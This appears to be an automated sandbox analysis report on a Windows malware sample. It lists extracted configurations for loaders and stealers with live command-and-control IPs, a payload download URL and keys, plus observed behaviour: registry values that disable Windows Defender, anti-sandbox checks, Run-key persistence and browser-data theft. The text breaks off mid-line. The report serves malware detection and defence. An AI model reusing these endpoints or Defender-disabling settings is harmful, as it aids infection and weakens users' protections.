Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 23:06
Static task
static1
Behavioral task
behavioral1
Sample
06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
Resource
win10v2004-20250217-en
General
-
Target
06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
-
Size
938KB
-
MD5
d8c7db0634dc3956c08f61096b6b8e9b
-
SHA1
fc6c24b4fa8091514076611a49088bc087fc9f11
-
SHA256
06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f
-
SHA512
51476aff3a60b4d536285849a675c28e3ce87bbfbc1b5ad6def9099cb7c3a9645114c92b572f58939d5d774f25a3d7f24fa9c24107f68ee62385fee8e2f1a580
-
SSDEEP
24576:1qDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:1TvC/MTQYxsWR7a0Q
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
xworm
5.0
45.154.98.175:6969
uGmGtmYAbzOi1F41
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
systembc
towerbingobongoboom.com
62.60.226.86
-
dns
5.132.191.104
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000600000001707f-62.dat family_xworm behavioral1/memory/2484-70-0x0000000000100000-0x0000000000110000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3500-607-0x00000000008F0000-0x0000000000D48000-memory.dmp healer behavioral1/memory/3500-608-0x00000000008F0000-0x0000000000D48000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e6410dd2f6.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e6410dd2f6.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e6410dd2f6.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" e6410dd2f6.exe -
Stealc family
-
Systembc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vertualiziren.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gvnsf.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd4e8b5947.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cb98fa6f53.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 65ac27f01e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e6410dd2f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c77bb98cda.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 51a7d2c853.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2924 powershell.exe 12 1516 powershell.exe 14 3032 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4012 powershell.exe 3928 powershell.exe 2924 powershell.exe 1516 powershell.exe 3032 powershell.exe 3928 powershell.exe 2396 powershell.exe 1724 powershell.exe 1460 powershell.exe 4016 powershell.exe -
Downloads MZ/PE file 23 IoCs
flow pid Process 11 2240 Gxtuum.exe 12 1516 powershell.exe 14 3032 powershell.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 7 2108 rapes.exe 18 1420 BitLockerToGo.exe 33 1572 BitLockerToGo.exe 146 2108 rapes.exe 146 2108 rapes.exe 146 2108 rapes.exe 4 2924 powershell.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000500000001c6e8-739.dat net_reactor behavioral1/memory/4072-747-0x0000000000AA0000-0x0000000000B00000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gvnsf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gvnsf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd4e8b5947.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cb98fa6f53.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 65ac27f01e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 65ac27f01e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e6410dd2f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c77bb98cda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd4e8b5947.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c77bb98cda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e6410dd2f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cb98fa6f53.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 51a7d2c853.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 51a7d2c853.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe -
Executes dropped EXE 29 IoCs
pid Process 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 2108 rapes.exe 2400 nhDLtPT.exe 2240 Gxtuum.exe 2484 cnntXtU.exe 600 vertualiziren.exe 2072 cd0ae9eb0c.exe 2392 TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE 2408 gvnsf.exe 900 483d2fa8a0d53818306efeb32d3.exe 2144 cd4e8b5947.exe 1532 9cab6ad180.exe 1688 9cab6ad180.exe 2508 cb98fa6f53.exe 1780 c77bb98cda.exe 2836 51a7d2c853.exe 2664 65ac27f01e.exe 2956 ef30a65d57.exe 3500 e6410dd2f6.exe 3764 zY9sqWs.exe 3868 PcAIvJ0.exe 3420 v6Oqdnc.exe 3800 MCxU5Fj.exe 896 MCxU5Fj.exe 3504 ce4pMzk.exe 4072 mAtJWNv.exe 4024 mAtJWNv.exe 2212 SvhQA35.exe 3764 chromium.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 65ac27f01e.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine gvnsf.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine cd4e8b5947.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine c77bb98cda.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine e6410dd2f6.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine vertualiziren.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine cb98fa6f53.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 51a7d2c853.exe -
Loads dropped DLL 64 IoCs
pid Process 2924 powershell.exe 2924 powershell.exe 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 2108 rapes.exe 2400 nhDLtPT.exe 2108 rapes.exe 2240 Gxtuum.exe 2240 Gxtuum.exe 2108 rapes.exe 1516 powershell.exe 1516 powershell.exe 3032 powershell.exe 3032 powershell.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 1532 9cab6ad180.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 2884 WerFault.exe 2884 WerFault.exe 2884 WerFault.exe 2884 WerFault.exe 2884 WerFault.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 2356 WerFault.exe 2356 WerFault.exe 2356 WerFault.exe 2108 rapes.exe 2108 rapes.exe 1420 BitLockerToGo.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 1572 BitLockerToGo.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 2108 rapes.exe 1828 WerFault.exe 1828 WerFault.exe 1828 WerFault.exe 2108 rapes.exe 2108 rapes.exe 1944 WerFault.exe 1944 WerFault.exe 1944 WerFault.exe 2108 rapes.exe 3800 MCxU5Fj.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3892 WerFault.exe 3580 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features e6410dd2f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e6410dd2f6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd0ae9eb0c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\cd0ae9eb0c.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\51a7d2c853.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\51a7d2c853.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\65ac27f01e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\65ac27f01e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef30a65d57.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\ef30a65d57.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6410dd2f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\e6410dd2f6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ipzvs8T3\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" cnntXtU.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001871c-101.dat autoit_exe behavioral1/files/0x0005000000019b16-430.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 2108 rapes.exe 600 vertualiziren.exe 2392 TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE 2408 gvnsf.exe 900 483d2fa8a0d53818306efeb32d3.exe 2144 cd4e8b5947.exe 2508 cb98fa6f53.exe 1780 c77bb98cda.exe 2836 51a7d2c853.exe 2664 65ac27f01e.exe 3500 e6410dd2f6.exe 3420 v6Oqdnc.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1532 set thread context of 1688 1532 9cab6ad180.exe 71 PID 2144 set thread context of 1420 2144 cd4e8b5947.exe 74 PID 2508 set thread context of 1572 2508 cb98fa6f53.exe 78 PID 3800 set thread context of 896 3800 MCxU5Fj.exe 116 PID 4072 set thread context of 4024 4072 mAtJWNv.exe 121 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe File created C:\Windows\Tasks\Test Task17.job vertualiziren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 1156 1532 WerFault.exe 70 2884 1688 WerFault.exe 71 2356 2836 WerFault.exe 80 1828 3764 WerFault.exe 105 1944 3420 WerFault.exe 113 3892 3800 WerFault.exe 115 3580 896 WerFault.exe 116 3272 4072 WerFault.exe 120 -
System Location Discovery: System Language Discovery 1 TTPs 51 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cb98fa6f53.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65ac27f01e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 51a7d2c853.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vertualiziren.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cd0ae9eb0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cd4e8b5947.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef30a65d57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9cab6ad180.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language ef30a65d57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvnsf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9cab6ad180.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e6410dd2f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c77bb98cda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage ef30a65d57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2984 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1540 taskkill.exe 2084 taskkill.exe 284 taskkill.exe 1948 taskkill.exe 2872 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 c77bb98cda.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a c77bb98cda.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 